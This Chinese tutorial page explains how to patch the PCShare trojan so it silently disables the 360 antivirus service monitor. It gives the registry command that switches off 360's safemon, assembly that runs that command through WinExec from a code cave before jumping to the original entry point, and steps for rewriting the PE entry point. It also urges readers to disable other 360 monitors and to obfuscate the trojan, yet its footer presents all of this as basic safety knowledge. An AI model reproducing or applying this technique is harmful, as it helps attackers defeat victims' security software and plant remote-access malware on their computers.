明輝手游網(wǎng)中心:是一個(gè)免費(fèi)提供流行視頻軟件教程、在線學(xué)習(xí)分享的學(xué)習(xí)平臺(tái)!

PCSHARE過360服務(wù)項(xiàng)監(jiān)控

[摘要]ASM匯編 這個(gè)是最舒服的, 用OD打開已經(jīng)配置好的馬, 找0區(qū)(也可以用TOPO加空段)要很大一片哦!右擊, 選擇“二進(jìn)制”→&...

ASM匯編

這個(gè)是最舒服的, 用OD打開已經(jīng)配置好的馬, 找0區(qū)(也可以用TOPO加空段)要很大一片哦!右擊, 選擇“二進(jìn)制”→“編輯”, 在ASCII中輸入“Cmd /c REG add HKLM\SOFTWARE\360Safe\safemon /v MonAccess /t REG_DWORD /d 0 /f”記下寫入命令的改動(dòng)的第一個(gè)地址, 假設(shè)為401180。

再找一個(gè)小空段, 記下地址, 假設(shè)為40116A

寫入:

Push 401180                (也就是那個(gè)改動(dòng)的地址)

Call WinExec

Jmp 原程序入口點(diǎn)(在OD右邊窗口的EIP后面可以看到)

打開OC把40116A轉(zhuǎn)換為文件偏移0000056A

再用PEditor打開, 把原入口點(diǎn)改為0000056A

這樣一個(gè)過360服務(wù)監(jiān)控的木馬就誕生了。

(大家完全可以按照加花的步驟來寫, 就是命令不同而已)

大家也可以禁用其他360的監(jiān)控項(xiàng)目, 即使加個(gè)花都沒問題, 隨便大家發(fā)揮了。


上面是電腦上網(wǎng)安全的一些基礎(chǔ)常識(shí),學(xué)習(xí)了安全知識(shí),幾乎可以讓你免費(fèi)電腦中毒的煩擾。